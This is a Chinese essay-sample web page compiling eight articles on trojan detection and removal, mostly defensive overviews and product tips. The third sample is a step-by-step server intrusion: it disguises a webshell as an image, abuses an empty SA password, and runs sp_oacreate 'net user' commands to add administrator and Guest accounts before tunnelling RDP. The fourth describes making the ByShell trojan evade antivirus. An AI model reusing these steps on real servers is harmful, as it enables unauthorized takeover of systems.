木马检测

开篇：润墨网以专业的文秘视角，为您筛选了八篇木马检测范文，如需获取更多写作素材，在线客服老师一对一协助。欢迎您的阅读与分享！

木马检测范文第1篇

关键词：行为序列；模糊判定；计算机；木马；检测；方法

中图分类号：TP393.08 文献标识码：A文章编号：1007-9599 (2011) 16-0000-01

Behavioral Sequence Gray Fuzzy Detection Method in the Computer Trojan Determine Analysis

Zhang Liang

(Weifang Branch of China Unicom,Weifang261041,China)

Abstract:Computer Trojan is hidden in the computer for malicious software,the need for clear,to ensure the normal operation of computer and data puter Trojan is difficult to determine,for this problem,a behavior sequence to determine the gray blur of the computer Trojan detection.Determination of the specific method for computer network communication,boot,run and hide aspects of self-protection to detect Trojans,allow the computer to normal procedures and an effective distinction between Trojan horse programs.Discuss the principle of detection of Trojan horses,to improve computer security protection.

Keywords:Behavior sequence;Fuzzy decision;Computer;Trojans;

Detection;Method

木马是计算机中严重威胁数据安全、影响运行的一种恶意程序，木马的检测和判定一般分为动态和静态两类。动态检测是对系统的资源条件进行监控，将程序在启动、安装和运行中的动作同木马动作匹配后进行判定。比如在Windows操作系统下，木马隐藏启动的主要方式是修改系统启动脚本文件、写注册表、注入系统文件等，在动态检测中，通过监视系统文件和注册表项状态判定木马。静态检测是指对木马程序进行静态特征分析提取，然后根据木马特征，对程序使用判定规则进行推理判定。比如通过静态分析PE文件，对程序运行时可能调用的API集合进行获取，再拿来匹配木马攻击常用的API调用序列，结合静态危险指数判定木马程序。木马检测方法有很多，但是对于单一的检测方法来说，漏报和误报的问题仍然得不到有效解决。探讨行为序列灰色模糊判定下，木马检测的方法，为实现计算机木马程序的有效判定起到促进作用。

一、木马检测

木马检测有基于行为的木马检测和基于行为序列的木马检测。基于行为的木马检测是先将一系列的异常行为规定为规则，在系统运行的过程中，通过监视在运行的程序的行为，再与规则相比较，从而判定该程序是否为木马。在分析木马行为的时候，又可以从主机资源访问行为、网络行为、主机系统调度行为三个方面进行。其中主机资源访问行为是指木马程序对目录、文件、键盘、注册表、屏幕等操作，常常发生在木马进行隐藏运行和开机启动的时候。网络行为主要是指木马使用协议发起端口复用、打开端口、建立连接、域名解析、传输数据等操作，常常在木马网络通信中使用。而主机系统调度行为主要是指木马对运行中系统的线程、进程、系统函数、加载的模块等的操作，常常在木马自我防护和隐藏允许的时候使用。基于行为序列的木马检测是对木马程序行为分析的基础上进行的判定操作，难点在于异常行为的界定。在计算机的发展中，特别是恶意代码实现技术中的隐藏技术的长期发展，以及大规模的应用自动升级和P2P技术，已经越来越难界定木马与正常应用程序，如果是单一角度的行为检测已经完全不能解决问题了。但是，木马程序从根本上还是显著区别于正常程序的，将木马行为序列和可疑行为序列进行比较，可以提高木马检测的检出率。

二、灰色模糊判定下计算机木马检测方法

木马设计方案为行为检测方法得到的多个可疑程序的行为序列，而设计方案的评价指标为实现隐藏运行、网络通信、自我防护、开机启动二级目标使用方法可能被木马使用的概率，这样，就将木马的判定问题转换为了木马决策问题。而评价的四个指标都是定性的，首先使用模糊数量化处理指标，在灰色关联分析的基础上，使用模糊优选模型对木马方案进行排序，再结合危险指数判定木马程序。

在这个木马检测方法中，首先是要量化处理评价指标。木马程序使用不同方法实现隐藏运行、网络通信、自我防护和开机启动的概率不同，在对程序行为判定是否为木马的时候常常使用很可能、可能和不太可能等进行定性描述，然后使用梯形模糊数量化处理这些评语。量化处理评价指标过后是对方案属性指标的规范化，而规范化的第一步是确定理想方案指标序列，是比较属性指标的优劣。第二步是模糊数的规范化，在评判的时候，需要消除量纲的影响，使度量尺度统一，规范化处理属性指标，使评判保证等效性。然后还要确定灰色模糊的优属度，通过对方案的理想参照序列和比较序列进行关联分析，得到方案指标相对其理想值的灰色隶属度，再确定灰色模糊的优属度。最后，结合危险指数，判定行为序列是否为木马。

三、讨论

行为序列灰色模糊判定下计算机木马检测方法，是使用主机资源访问行为、网络行为和主机系统调度行为检测技术，实现对木马攻击树叶子节点方法的全部检测，通过对可疑程序行为序列的构建，计算灰色模糊的优属度，结合危险指数，判定木马程序。当然，在本文中仅仅在大致上说明了此方法的原理以及总体思路，具体实施起来还需要很多的细节进行完善、很多的具体数据进行探讨，才能最终形成一个完整的行为序列灰色模糊判定下计算机木马检测方法，从而更好的保证计算机数据的安全。

参考文献：

[1]高伟.基于灰色模糊优选模型的上市公司投资价值评价[J].财会通讯,2010,19:95

木马检测范文第2篇

根据江民反病毒中心的监测统计，在其截获的2万余种电脑病毒及木马程序和被感染的72万多台计算机中，有相当的部分是被专门利用Real Player媒体播放器漏洞进行传播的“Real蛀虫”病毒的最新变种所感染的，数字触目惊心!

一、为什么视频木马如此猖獗?

事实上，利用Real Player播放器的固有漏洞，在RM／RMVB格式视频中夹带病毒及木马程序，然后通过固有漏洞对用户进行攻击的事件已经是相当普遍了，其原因一方面是Real Player播放器知名度和覆盖面都非常广，一个.RM或.RMVB格式的视频被植入病毒或恶意木马，就可能会以迅雷不及掩耳之势殃及成百上千台电脑。

另一方面在视频中央带病毒及木马程序的实现技术非常简单，网上甚至有专门的将病毒(木马)捆绑于指定视频文件的应用软件免费提供给所有用户下载，也就是说几乎每一个用户都可以在自己的电脑上制作“带毒”或“挂马”视频。

二、防范视频木马的应对策略

用户一般是很容易发现视频中夹带病毒或恶意木马程序的，比如用户在播放视频短片或影视作品时，网页浏览器会时不时地自动弹出骚扰广告窗口，有时候这些自动弹出的广告网页窗口会越来越频繁，最后以至于耗尽用户的系统资源!

防范木马(病毒)一般有两种常见思路：

一种是“权宜之计”，也就是有效阻止木马的运行，使木马的盗取和破坏功能发挥不到作用，沿着这种思路，用户可以通过设置防火墙的应用程序访问网络的规则来禁止Real Player播放器连接网络，从而使Real Player播放器无法依托网络调用带毒或挂马网页。

不过这种方法毕竟治标不治本，并且以后用户需要使Real Hay-er播放器访问网络时，切换起来也麻烦。

另一种思路就是将木马(病毒)与之相捆绑的正常视频源文件分离，也就是与那些进行视频木马捆绑的操作“反着干”，这当然是既治标又治本的方法。

目前常用的专门根除视频木马的工具虽然有不少，但大都不能支持即时木马(病毒)特征库的升级，能够准确识别和干净清除木马的数量十分有限，并且有很大一部分是有功能限制的共享软件。笔者这里推荐“影音巡警V2.0”，它是没有任何功能限制的绿色环保软件，无须安装，永久免费使用，并且支持木马(病毒)特征库的即时升级。

影音巡警V2.0下载地址：

http：／／.cn／detail／31／307232.shtml

三、“影音巡警V2.0”使用方法

“影音巡警V2.0”是一款由著名的超级巡警开发团队最新推出的专业视频木马(病毒)查杀软件，可以支持包括RM、RMVB、WMV和WMA等多种格式的视频木马(病毒)的智能检测。

用户将软件下载后，解压即可直接使用了，软件在每一次启动时，会主动检测是否有最新的木马(病毒)特征库更新，如果有，软件会自动完成更新升级。

接下来用户只要在软件的“选择文件或路径”框中指定需要进行检测的视频文件，接着再选择一个检测方式，最后单击“检索”按钮，软件即可自动完成对指定视频文件的木马检测和清除操作，非常快捷和方便。

这里需要说明的是，这款软件支持“快速检测”和“全面检测”两种检测方式，对于视频较大的文件，笔者建议大家可以选择“快速检测”的最优化方式。

木马检测范文第3篇

关键词：程序后台；木马；提权；映射端口；远程登录

现在许多Windows2000/2003/2008服务器都或多或少的存在安全问题，不是系统软件存在漏洞，就是网站程序上传出现漏洞，再加上网站管理员往往忽视了一些有效的防御手段，这都会使网站在黑客面前不堪一击，他们可以在网站管理员毫无觉察的情况下，任意提权，上传木马，并下载其中的程序，从而使整个服务器的运行出现问题。

如今，校园网服务器的安全，关系到整个学校日常工作的正常运行，一旦被侵入，后果不堪设想，而此类事故的产生必有隐患，那么就让我们的管理员行驶“绿客”的职责，在与黑客“赛跑”的过程中，提前一步对服务器进行检测，避免以上种种问题的发生，为您所管理的服务器打上一针强心剂。

检测的环境及工具

准备一台服务器，如Windows Server 2003 sp2 SQL2000/2005/2008系统。

准备木马工具：ASP木马、ASPX木马、PHP木马，Mstsc.exe远程登录工具，JAVA语言环境、NC.exe、内网渗透利器――reDuh。

服务器检测实战演练

1.省略)+SQL、PHP+MYSQL等，并且都提供后台演示或注册上传功能，这样我们就可以通过网站程序的后台进行上传木马或者提权。

ASPX图片木马就是小图片加上aspx木马程序生成的文件，看起来是图片，执行时是木马，上传时能逃过文件检测判定。在Windows下的DOS窗口，键入copy1.jpg/b+ 2.aspx/a2.省略程序目录以及ASPX中写权限防止上传图片木马。

2.通过木马程序进行提权

接下来，我们查看SQL用户，有些网站管理员直接给SQL超级用户（SA）的口令，却没有设置密码进行保护，这也使得服务器较容易遭到病毒或木马的攻击。通过图1中的Webshell，我们可以上传其他木马方便我们对SQL提权（如图2），进而通过SQL提升自己的管理权限。

3.省略网站程序的web.config这个配置文件，可以查到SQL数据库用户名与密码：uid=sa;pwd=，即用户为SA，密码为空。

4.通过查询分析器提权

然后，我们通过本地SQL连接到远程服务器，并通过查询分析器提权。

（1）连接数据库。

driver={SQL Server}；server=服务器IP；uid=用户名；pwd=密码；database=数据库名

（2）添加新用户。

declare@shell int exec sp_oacreate 'wscript.shell'，@shell output exec sp_oamethod @shell，'run'，null，'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

（3）把用户加到管理组。

declare @shell int exec sp_oacreate 'wscript.shell'，@shell output exec sp_oamethod@shell，'run'，null，'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

（4）激活GUEST用户。

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell，'run'，null，'c:\windows\system32\cmd.exe /c net user guest /active:yes'

（5）把Guest加到管理组。

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell，'run'，null，'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'

进行上面一系列的提权后，生成管理用户与口令，进行远程登录服务器。

5.内网渗透利器的远程执行

根据我们上传的木马进行操作，上传为我们服务的其他木马，通过木马上传的内网渗透利器在服务器上远程执行，但不要关闭（如图3）。

6.本地与远程架桥

用服务器上的木马与本地“JAVA语言+NC”进行连接，架设一桥，映射端口，伪装成一个局域网，因为远程服务器只能在本地运行，我们可以采用127.0.0.1这个地址远程登录，进入服务器，内网的服务器也是通过这种方法进行检测（如上页图4）。

（1）在本地DOS窗口下运行JAVA语言连接远程服务器上的木马，打开远程服务器在本地1010端口。注意这个不能关闭。

DOS下命令：java -jar reduhclient.jar ....../ reDuh.aspx

（2）新开一个命令行，用NC连接本机1010端口。

DOS命令窗口输入命令：nc -vv localhost 1010（如上页图5）。

在DOS命令窗口输入命令：[createTunnel]1234:127.0.0.1:3389，连接远程服务器3389端口。

（3）最后本机窗口有三个，一个是远程服务木马，另两个是本地木马映射连接端口(如图6)。

7.进入远程服务器

在本地用mstsc.exe远程登录程序，进入远程服务器。用户口令以Sys_guest为例。这样我们就控制了整个服务器（如图7、图8）。（本方法在客户端Windows server 2003 sp2+SQL2000+JAVA，服务器Windows server 2003/2008+sql2000/2005+aspx环境下测试通过）。

木马检测范文第4篇

奇怪的“图片”

前段时间，笔者直接打开了QQ传过来的一幅图片。就此开始了QQ和网游账号被盗、摄像头被监控的噩梦……

在种种迹象表明自己被木马远程监控之后，笔者断开网络，对电脑进行了全面的安全检测和分析。分析证明图片是一个伪装极其高明的木马文件，捆绑木马后照样能显示正常的图片，而目木马文件作过了专门的免杀处理，用卡巴斯基、KV等多款杀软进行了检测，并未发现有病毒。对于这类免杀过的木马，真的只有依靠主动防御功能才能进行防范了。但是笔者在用安全工具“Wsyscheck”检测系统内核时，发现系统中的SSDT表全部被破坏!

运行wsyscheck，选择“内核检查／SSDT检查”选项页，在其中可看到系统SSDT表恢复成了默认值，也就是未装杀毒软件时的情况。而正常状态下，安装了瑞星杀毒软件2008或其它主动防御的杀毒软件之后，SSDT表中显示显示有红色标注的被修改的SSDT表信息(如图1)。

SSDT的全称是“system Services DescriptorTable”，中文翻译为“系统服务描述符表”。Windows系统中的SSDT表，是把应用层指令传输给系统内核的一个通道。所有杀毒软件的主动防御功能都是通过修改SSDT表，拦截程序对系统内核的更改，让木马病毒等无法正常的运行。

在Wsyscheck工具中，切换到“服务管理”选项页中，可以看到有一个名为“SteelKernel32”的服务非常可疑。查看该服务的描述信息，发现为“ByShell服务端，远程监控管理官方网站”，很明显这是一个木马服务。依据服务信息上网查询，才知道这原来就是大名鼎鼎的ByShell木马。

瑞星VS.Byshell

其实ByShell木马就是通过对当前系统的SSDT表进行破坏，使用系统原来的SSDT表覆盖现在的SSDT表，从而让瑞星2008的主动防御功能彻底失效的，而木马程序则可以正常进行远程监控。笔者为了求证木马能否成功突破瑞星2008主动防御，特意从网上下载了ByShell木马，使用默认的配置生成服务端，并进行了免杀处理。在一个全新的系统中安装瑞星2008并开启了主动防御功能，结果发现ByShell在运行时，主动防御功能没有发出任何提示。

木马检测范文第5篇

【关键词】木马病毒危害应对

【中图分类号】TP309.5 【文献标识码】A 【文章编号】1674-4810（2014）08-0182-02

一 木马病毒的危害

随着科技的不断进步，网络环境呈现多元化发展，一些网络木马病毒的传播和感染也发生了很大的变化，由原先的单一明显到现在的复杂隐蔽，而一些单位网络和内部网络环境的变化更是给木马提供了很好的生存空间。目前木马已经成为网络系统入侵的重要手段，计算机感染了木马病毒将面临数据丢失、机密泄露的危险，它不是破坏计算机的软硬件这么简单，而是通过植入木马病毒将窃取计算机里面的密码和资料，甚至进行远程监控、偷窥用户的隐私等。木马病毒不仅针对个人用户，同时一些大型网络服务器也是其入侵对象，入侵者通过对其植入的木马病毒窃取系统管理员的口令，最终达到入侵系统目标服务器的目的。因此，一些重要单位、国防、外交以及商务部门受到木马病毒入侵的危害会更大，有时可能会危及国家的存亡。

作为一种新型的网络病毒，木马病毒跟普通病毒相比在有关技术和功能上存在很大的差异，一般病毒的设计主要侧重于隐蔽性和传播性的实现，而木马病毒还要强调与外界通信、反清除、反识别能力。所以对于木马病毒的防御和清除的难度比较大，要先分析其传染的原理以及传播方式，从根本上来应对木马病毒的入侵。

二 木马病毒分析

1.木马病毒产生背景

计算机木马病毒的产生是计算机技术和社会信息化进程发展到一定阶段的产物，它产生的背景是：（1）作为计算机犯罪的新型方式，它取证困难、风险小、破坏大，具有动态性、随机性和瞬时性等特点。（2）计算机属于电子设备，在输入、存储、输出等环节都容易发生篡改、丢失、伪造和损坏等情况，这些脆弱性使得木马病毒入侵十分方便。（3）信息系统中局域网的建设为木马病毒产生提供了必要的环境，局域网环境的复杂化，为病毒生存提供了最快最好的温床。

2.木马病毒的原理

木马病毒是一种计算机黑客用于远程控制计算机的程序，一旦进入就会驻扎在计算机里，随着计算机的运行而自动运转，对目标计算机进行特殊的操作，一般是窃取密码和重要文件，对控制计算机实施监控和资料修改等操作。

木马病毒能正常工作必须由客户端程序和服务端程序建立网络通信，这种通信是基于IP地址和端口号的。一般客户端不是木马程序，服务端才是木马程序，隐藏在服务端的木马程序一旦被触发，就会不断将通信的IP地址和端口号发给客户端，客户端利用服务端发出的信息与服务端建立一条通信线路，最终通过这条线路来控制服务端的计算机。绝大多数木马程序的客户端和服务端通信协议使用的是TCP/IP协议，也有部分使用UDP协议进行通信。

但通常情况下，服务端的木马程序首先要隐藏自己的行踪，伪装成合法的程序，然后通过修改注册表设置触发条件，保证自己可以被执行，一旦发现自己的注册表被修改或删除就能自动修复。

3.木马病毒的传播方式

木马病毒的传播方式比较多，主要有：（1）利用下载进行传播，在下载的过程中进入程序，当下载完毕打开文件就将病毒植入到电脑中；（2）利用系统漏洞进行传播，当计算机存在漏洞，就成为木马病毒攻击的对象；（3）利用邮件进行传播，很多陌生邮件里面就掺杂了病毒种子，一旦邮件被打开，病毒就被激活；（4）利用远程连接进行传播；（5）利用网页进行传播，在浏览网页时会经常出现很多跳出来的页面，这种页面就是病毒驻扎的地方；（6）利用蠕虫病毒进行传播等。

三 木马病毒的应对

1.木马病毒的防范

第一，木马病毒检测。很多情况下木马病毒都是基于TCP/IP通讯的客户端/服务端结构系统，不同的木马病毒默认打开的监听端口不同，所以通过查看电脑上的监听端口可以判断电脑是否中了木马病毒以及中了何种木马病毒。通过端口扫描软件，可以了解端口使用情况，进而来判断是否被木马病毒所控制。同时，使用端口扫描工具，通过内置的一个木马病毒端口列表文件，就能直接扫描电脑是否中了木马病毒。

第二，木马病毒防范。对于木马病毒，要在它没有进入系统时就进行适当的防范，具体的防范措施有：（1）安装最新的杀毒软件，特别是带有木马病毒拦截功能的杀毒软件，如金山毒霸、360安全卫士、诺顿和瑞星等。当安装完杀毒软件后，必须打开软件的系统监视功能，以便及时发现计算机系统的注册表、应用进程、内存等变动情况。当然还要随时对杀毒软件进行更新，以保证计算机受到保护；（2）及时更新系统漏洞补丁，升级系统软件和应用软件。软件在设计时难免会存在一些安全漏洞，但开发商会及时发现问题并进行补洞，所以要及时更新软件最新版本，提高计算机的免疫能力；（3）不要轻易打开陌生的电子邮件附件，如果你想打开请以纯文本方式阅读邮件；（4）不随意浏览陌生网站，包括一些网络电视广告或者网站联盟中的一些广告条和来历不明的网络链接，因为这些很有可能是木马病毒的入口。同时，不要使用未经杀毒的软件下载网站，软件升级要使用官方网站提供的升级包；（5）给电脑安装防火墙，即使你安装了杀毒软件，因为防火墙相当于电脑的门卫，掌管着系统的各个端口进出的身份验证。

2.木马病毒的清除

第一，木马病毒清除难易度评估。木马病毒的危害大小和其清除难易程度可以从以下四个方面来评估：（1）易植入性评估：对于木马病毒入侵来说第一件也是非常重要的一件事就是要能够进入到目标计算机，这就得考验木马病毒的易植入性能力。其中欺骗性和利用系统漏洞是木马病毒最常见的植入手法，各种小功能软件就成为木马病毒经常驻扎的地方。同时，蠕虫技术与木马技术的结合，也大大提高了木马病毒的易植入性。（2）隐蔽性评估：木马病毒一旦进入到目标计算机以后，就会在里面驻扎，长期潜伏而不被发现。那么对于木马病毒清除难易程度，评估木马的隐蔽性非常重要。一个隐蔽性较好的木马病毒很难被杀毒软件检查出来并且清除掉，这种就必须手动清除；但如果隐蔽性较差的木马病毒就很容易暴露自己，接着被杀毒软件发现、清除。所以可以说隐蔽性是木马病毒的生命，如果隐蔽性差，那么这种木马病毒将变得毫无价值。（3）顽固性评估：当木马病毒被检测出来以后，就要评估其另一个重要特性：顽固性。木马病毒顽固性的评估主要看这种木马病毒被检测出来以后首先能不能被杀毒软件清除，如果杀毒软件清除不了，再利用手动清除仍然无法一次性清除的木马病毒，说明其顽固性非常强。（4）有效性评估：有效性评估是指这种病毒一旦进入目标计算机以后能够跟其建立某种有效的联系，能够达到入侵者的目的，控制目标计算机并窃取想要的信息。一旦这种病毒能快速地与计算机达成联系，那说明它的有效性很好。

第二，清除木马方法。（1）自动方式：自动杀除木马病毒最简单的方法就是安装杀毒软件，如当下比较流行的查毒软件瑞星、金山毒霸、360安全卫士等，都可以将网络中的木马病毒给删除。但是木马病毒的更新速度常常快于杀毒软件的更新速度，一些新的木马病毒没有被杀毒软件识别出来，就有可能危及电脑的程序。所以在这种情况下，就要学会手动删除木马病毒。（2）手动方式：手动删除木马病毒之前还是要先用专业杀毒软件、杀木马病毒软件进行一轮清理，因为手动杀毒必须在对病毒有所了解的情况下，同时有可能造成系统的损害等意外情况。杀毒前可将杀毒软件的病毒库升级，了解中了什么病毒。在查杀木马病毒时，建议在安全模式下断开网络进行。

手动清除时首先要做到以下几点：根据杀毒软件提供的路径找到病毒，并进行备份，以防删除系统文件时系统损坏；做好注册表的备份；在了解是什么病毒情况下用互联网查找病毒的特征及清除方法。

使用手动清除木马病毒，建议使用U1-traedit32编辑器查看可疑文件内容，查找是否有木马病毒特征的代码，以确定文件是否被木马病毒传染，发现传染病毒的文件就及时清理，接着使用注册表编辑器删除木马病毒相关注册表即可。

参考文献

[1]糜旗、胡麒、宗俊.信息系统的防病毒木马方法[J].兵工自动化，2012（10）

[2]吴耀东.互联网木马病毒的分析与防范[J].科技视野，2013（8）

[3]王树森、陈平.木马病毒的攻击原理与防治策略[J].软件导刊，2012（6）

[4]朱明、徐骞、刘春明.木马病毒分析及其检测方法研究[J].计算机工程与应用，2003（28）

木马检测范文第6篇

关键词：木马；入侵；清除

1. 引言

世界上第一个计算机木马是出现在1986年的PC-Write木马。它伪装成共享软件PC-Write的2.72版本(事实上，编写PC-Write的Quicksoft公司从未发行过2.72版本)，一旦用户信以为真运行该木马程序，那么他的下场就是硬盘被格式化。随着计算机技术的不断发展,编写木马程序的方法、手段及传播途径、逃避查杀的技术也不断地翻新发展。

2.木马的入侵原理和入侵手段

2.1木马的入侵原理

木马都是网络客户/服务模式（C/S），它分为两大部分,即客户端和服务端。其原理是一台主机提供服务(服务器) ,另一台主机接受服务(客户机),作为服务器的主机一般会打开一个默认的端口进行监听。如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程序就会自动运行,来应答客户机的请求。这个程序被称为守护进程。 当攻击者要利用木马进行网络入侵，一般都要完成"向目标主机传播木马"，"启动和隐藏木马"，"建立连接"，"远程控制"等环节。

2.2木马入侵手段

木马能不能完全发挥它的功能和作用，关键一步就是能否成功地进入到目标主机。随着计算机技术的不断发展,编写木马程序的方法、手段及传播途径、逃避查杀的技术也不断地翻新发展。

木马的传统入侵方式主要有三种：

1）电子邮件入侵传播，控制端将木马程序以附件的形式夹在邮件中发送出去，收信人只要打开附件系统就会感染木马；

2）下载入侵传播，一些非正规的网站以提供软件下载为名义，将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。

3）远程入侵传播，黑客通过破解密码和建立IPC$远程连接后登陆到主机，将木马服务端程序拷贝到计算机中的文件夹中，然后通过远程操作让木马程序在某一个时间运行。

木马入侵手段的发展：

1）反弹端口型木马

目前，由于大部分防火墙对于连入的连接往往会进行非常严格的过滤，能对非法端口的IP包进行有效的过滤，非法连接被拦在墙外，客户端主动连接的木马，现已很难穿过防火墙。与一般的软件相反，反弹端口型木马是把客户端的信息存于有固定IP的第三方FTP服务器上，服务端从 FTP 服务器上取得信息后计算出客户端的IP和端口，然后主动连接客户端。另外，网络神偷的服务端与客户端在进行通信，是用合法端口，把数据包含在像HTTP或FTP的报文中，这就是黑客们所谓的"隧道"技术。

2）缓冲区溢出植入型木马

木马设计者利用缓冲区溢出漏洞，首先将木马攻击代码(ShellCode)加载到被攻击进程的地址空间中。此攻击代码是由可执行机器码组成的字符串，通常以参数的形式传递给被攻击程序并被加载到其堆栈段。然后编写恶意溢出程序在缓冲区中造成溢出，覆盖函数返回地址的内容或者更改void类型的函数指针，使其指向缓冲区可执行恶意代码(ShellCode)的起始地址，就可以运行攻击代码。缓冲区溢出植入型木马利用目标机器的溢出漏洞进行木马植入，不需用户进行激活即可完成植入，对目标主机影响小。造成被攻击程序溢出的代码由木马控制端计算机传人，且只存在于目标主机的内存之中，隐蔽性好，难以查杀。

3.木马病毒的清除

3.1DLL型木马查杀

DLL木马的查杀比一般病毒和木马的查杀要更加困难，建议用户经常看看系统的启动项中有没有多出不明的项目，这是DLL木马Loader可能存在的场所之一。如果用户有一定的编程知识和分析能力，还可以在Loader里查找DLL名称，或者从进程里看多挂接了什么陌生的DLL。对普通用户来说，最简单有效的方法还是用杀毒软件和防火墙来保护自己的计算机安全。

3.2反弹端口型木马查杀

目前发现的反弹端口型木马有网络神偷和灰鸽子(辐射版)两种。如果中了反弹端口型的木马，对于网络神偷，我们可以用下面的方法清除：

   在中了木马的机器上运行客户端程序，可以再生成并运行新的配置正确的服务端，就会把原来的服务端冲掉。重新运行客户间 ，在客户端的"服务端在线列表"找到自己并连接上，再用菜单"网络" - >"远程卸载" ，就可以彻底清除。

3.3工具检测查杀

在手工检测的情况下，如果不能发现木马入侵的蛛丝马迹，可以借助一些反病毒软件。对于伪装过的木马，可以使用MT捆绑克星软件，MT捆绑克星通过分析程序的文件头特征码．可以查看文件是否捆绑了木马。

4.后言

木马的入侵方法是多种多样的,新的木马会不断出现, 要检测木马的入侵和彻底清除木马也不是一件很容易的事。计算机用户必须提高警惕，采用预先防护措施，通过端口, 网络连接, 注册表以及一些查杀木马工具的运用,对发现的异常情况采取补救，如为系统打补丁，或升级软件版本;对于多余的网络服务和系统功能，应该禁止，并从技术和管理两个方面入手，完善安全防护体系，不断提高网络系统的安全性。

参考文献：

[1] 连一峰．王航编著．网络攻击原理与技术．科学出版社．2008．4.

木马检测范文第7篇

新版的V4.0beta2较之前期版本的功能更上一层楼，让我们体验到了“安全卫士在手，从此别无所求”的感受，新版V4.0beta2首先是在木马查杀上做足了功夫，独家集成双引擎，查杀效果加倍，其次是装机必备的软件一键搞定，并且保证了软件无插件、无病毒，这也正是用户所关注的焦点所在，解决了广大用户的后顾之忧。

一、木马查杀独家集成双引擎，查杀效果加倍

臭名昭著的机器狗大家可能听得不少，但怎样才能免疫它呢？安全卫士在扫描时会提示我们安装免疫程序，建立免疫文件，将已知的相关网站屏蔽掉，确保我们的系统安全。

新版的安全卫士较之旧版相比，独家集成双引擎，添加了安天木马查杀引擎（如图1），结合传统型木马特征库精确匹配及主动型智能特征检测两种机制，全面检测系统隐藏木马，追击查杀机器狗木马等顽固木马，使木马更无藏身之地，确保我们的网络安全。

二、软件管理一条龙服务

现在系统重装或是系统恢复（还原）再平常不过了，不过后续工作就不同了，常用的软件要一个一个去搜索、下载、安装，费时费力不说，有时还不一定能找到官方的下载网站。现在好了，有了新版的V4.0beta2安全卫士，就不用在东奔西走了，其实现了软件下载、安装、管理一条龙服务，在360安全卫士窗口中点击“装机必备软件”，这里列出了20多款装机必备软件（如图2），只需要点击“下载并安装”即可在后台下载安装。而且还不用担心安全问题，所有360安全卫士推荐的软件都经过官方安全认证，绝对不含木马和恶意插件。

在360安全卫士窗口中直接点击“下载并安装”，软件默认保存在F:\360安全卫士\360SAFE\SoftMgr\Download文件夹中，如果想修改保存路径，可以点击“下载目录”，在打开的“奇虎360软件管理”窗口中点击“浏览”按钮，指定一个软件保存路径既可。

三、软件随机启动，要听我的

随机启动的软件太多就会拖慢开机速度，这大家都知道，如果要修改开机启动软件，一般需要在“系统配置实用程序”或注册表中修改Run键值，修改过程繁琐，用360安全卫士管理软件，就方便多了。在窗口中切换到“管理应用软件”或“开机启动软件”标签，这里就能看到所有随机启动的软件（如图3），我们可以根据自己的实际需要来决定哪个软件随机启动，如果不需要，点击软件后面的“禁用”即可，非常方便。

四、进程加载一点即清，进程结束一键搞定

对于进程的加载，是多数菜鸟头疼的问题，在系统工作不正常时，在资源管理中根本分辨不出哪个是正常进程，哪个是非法进程，盲目行动可能造成系统崩溃。不过在360安全卫士中就方便了，切换到“正在运行软件”标签，在窗口的右上方，点击“显示加载到进程中的DLL”（如图4），即可在窗口下面显示我们选中的进程，所加载调用的DLL文件，这样我们就容易分辨进程的合法与合法了。对任何想关闭的软件点击“结束进程”即可，再顽固的程序也能立刻关闭。

木马检测范文第8篇

【关键词】计算机网络 网络安全 病毒 黑客入侵

一、计算机网络安全存在的问题

1.1 各种网络病毒和网络木马层出不穷

计算机网络具有开放性的特点，互联网的应用范围很广，涉及的人群面很大，这些都给计算机网络病毒、木马的滋生提供了机会。网络病毒和木马是计算机网络安全面临的常规性课题，也是一直存在的问题。网络病毒和木马的肆意侵犯，会导致计算机网络运行不畅通甚至瘫痪。同时，病毒和木马的入侵，对于经常使用计算机的企业、学校和事业单位来说，同样可能导致数据库受损、信息外泄等问题。诸多问题的存在，督促人们要加强对计算机网络病毒和木马的防御。

1.2 黑客入侵，影响网络系统安全

黑客一般是具备专业计算机网络知识的“电脑达人”，他们以破坏公共或私人的计算机网络系统为目的，从事非法的“入侵活动”。黑客的入侵，会对个人、企业或公共单位的计算机网络系统造成重大威胁，会导致系统被破坏、数据外流、信息外泄等。同时，黑客的肆意入侵，有可能对国家的政治安全和国防系统造成损害，导致机密信息被窃听，严重的将造成无法估算的损失。此外，黑客入侵金融系统或电子商务系统，会导致大量金融信息、企业数据的丢失，给经济发展带来严重危害。

1.3 人为操作的失误也将带来网络安全问题

计算机总归是要靠人来操作的，计算机网络需要用到的各种信息，同样需要人为因素的参与。总之，只要是人为操作的计算机系统，就会出现疏漏和失误。当前，人为操作失误或操作不当引发的计算机网络安全问题层出不穷。

二、计算机网络安全的防护策略

2.1 加强对病毒、木马的查杀工作，使用高性能软件

计算机网络病毒和木马滋生的一个重要原因，就是计算机软件存在漏洞和隐患，同时人们缺乏病毒、木马的防患意识。因此，要把计算机网络的定期检查、清理和查杀作为日常维护工作的重点。无论是家庭计算机，还是企事业单位的公用计算机，都要安装正规的杀毒软件，定期对计算机进行检测、查杀，对于发现的病毒和木马，迅速予以清理。同时，在日常计算机使用和网络利用的过程中，要注意使用高性能的正规软件，防止网络漏洞的出现，切断网络病毒、木马滋生的温床。要把网络信息安全做出维护重点，重要的数据和信息要备份，防止因病毒侵犯造成的信息丢失。

2.2 设置网络防火墙，保障网络系统安全

面对黑客的攻击和入侵，要时刻保持警惕，要根据计算机网络的实际状况实施防御策略。比如，要开启和设置防火墙，对黑客进行监控和防范。同时，要定期对防火墙进行检查、维护，根据防火墙报告情况设定不同的安全防御级别。再比如，要采取入侵检测技术对黑客的入侵进行监控和检测，对已经发现的入侵情况及时作出应对。另外，要采用认证和数字签名技术，对网络通讯过程中的双方进行身份认证，依照数字签名识别对方，提高身份信息的安全级别，防止个人重要信息的外泄。再者，要想方设法保障网络系统的安全，定期进行系统检测和升级，使用更为安全的系统软件和补丁，对于系统中存在的隐患和不确定因素，要及时进行处理。

2.3 制定网络操作规范制度，提高人为操作水平